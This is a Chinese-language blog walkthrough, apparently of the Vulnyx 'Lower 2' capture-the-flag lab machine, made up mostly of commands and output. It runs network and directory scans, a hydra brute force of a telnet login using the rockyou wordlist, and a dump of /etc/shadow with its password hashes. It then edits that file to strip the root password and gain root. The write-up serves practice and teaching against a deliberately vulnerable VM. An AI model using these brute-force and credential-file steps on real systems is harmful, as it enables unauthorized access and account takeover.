Pepster'Blog
Vulnyx-Lower 2-Walkthrough
城南花已开 Lv6
  2025-02-16 15:07:12   2025-04-18 23:34:08    1.2k 字  7 分钟  

信息收集

服务探测

额外多了23端口telnet

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.186  08:00:27:d3:e0:8d       (Unknown)
192.168.60.254  00:50:56:fd:65:82       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 4 responded
export ip=192.168.60.186
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.186:22
Open 192.168.60.186:23
Open 192.168.60.186:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 15:07 CST
Initiating ARP Ping Scan at 15:07
Scanning 192.168.60.186 [1 port]
Completed ARP Ping Scan at 15:07, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:07
Completed Parallel DNS resolution of 1 host. at 15:07, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:07
Scanning 192.168.60.186 [3 ports]
Discovered open port 23/tcp on 192.168.60.186
Discovered open port 22/tcp on 192.168.60.186
Discovered open port 80/tcp on 192.168.60.186
Completed SYN Stealth Scan at 15:07, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.186
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-02-16 15:07:07 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
23/tcp open  telnet  syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:D3:E0:8D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

扫一下目录吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.186/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

没有什么信息

telnet爆破

只有一个telnet可以尝试爆破一下

我尝试了rootlower2无果后

发现ssh后有个banner

提示欢迎来到b.taylor 的server

尝试爆破即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ ssh ada@$ip
The authenticity of host '192.168.60.186 (192.168.60.186)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.186' (ED25519) to the list of known hosts.

###################################################
### Welcome to Brian Taylor's (b.taylor) server ###
###################################################

[email protected]: Permission denied (publickey).
❯ hydra -l b.taylor -P /usr/share/wordlists/rockyou.txt $ip telnet
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-16 15:20:14
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking telnet://192.168.60.186:23/
[23][telnet] host: 192.168.60.186   login: b.taylor   password: rockyou
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-16 15:20:31

用户提权

telnet登录一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ telnet $ip
Trying 192.168.60.186...
Connected to 192.168.60.186.
Escape character is '^]'.


lower2 login: b.taylor
Password:
Last login: Sun Feb 16 08:20:27 CET 2025 on pts/7
b.taylor@lower2:~$ ls
user.txt
b.taylor@lower2:~$ cat user.txt
edc9f5c55af87505033a20dd41931364

直接拿到user了

Root提权

通过id可以得知隶属于shadow组中

删除root密码即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
b.taylor@lower2:/tmp$ id
uid=1000(b.taylor) gid=1000(b.taylor) grupos=1000(b.taylor),42(shadow)
b.taylor@lower2:/tmp$ cat /etc/shadow
root:$y$j9T$RDW/7EgA4sElvqxLVk.Uo.$OmF5Lm4Ub/UeC2ua6tTQnHB07WKpYs1lOXl.lS581q8:20134:0:99999:7:::
daemon:*:19676:0:99999:7:::
bin:*:19676:0:99999:7:::
sys:*:19676:0:99999:7:::
sync:*:19676:0:99999:7:::
games:*:19676:0:99999:7:::
man:*:19676:0:99999:7:::
lp:*:19676:0:99999:7:::
mail:*:19676:0:99999:7:::
news:*:19676:0:99999:7:::
uucp:*:19676:0:99999:7:::
proxy:*:19676:0:99999:7:::
www-data:*:19676:0:99999:7:::
backup:*:19676:0:99999:7:::
list:*:19676:0:99999:7:::
irc:*:19676:0:99999:7:::
_apt:*:19676:0:99999:7:::
nobody:*:19676:0:99999:7:::
systemd-network:!*:19676::::::
messagebus:!:19676::::::
sshd:!:19676::::::
b.taylor:$y$j9T$du9sW7McN8WfjLKPRheP7/$pyE/4IrgDjurpaNzpdyxj8PYcOYyDksyYPG2rxEBxm4:20135:0:99999:7:::
telnetd-ssl:!:20134::::::
b.taylor@lower2:/tmp$ ls -al /etc/shadow
-rw-rw---- 1 root shadow 749 feb 16 07:10 /etc/shadow
b.taylor@lower2:/tmp$ vi /etc/shadow
b.taylor@lower2:/tmp$ su root
root@lower2:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@lower2:/tmp# cat /root/root.txt
235aa90b688b711a87d5d15c6e34dada

没几分钟就秒了😅

  1. 信息收集
    1. 服务探测
    2. telnet爆破
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
    2. telnet爆破
  2. 用户提权
  3. Root提权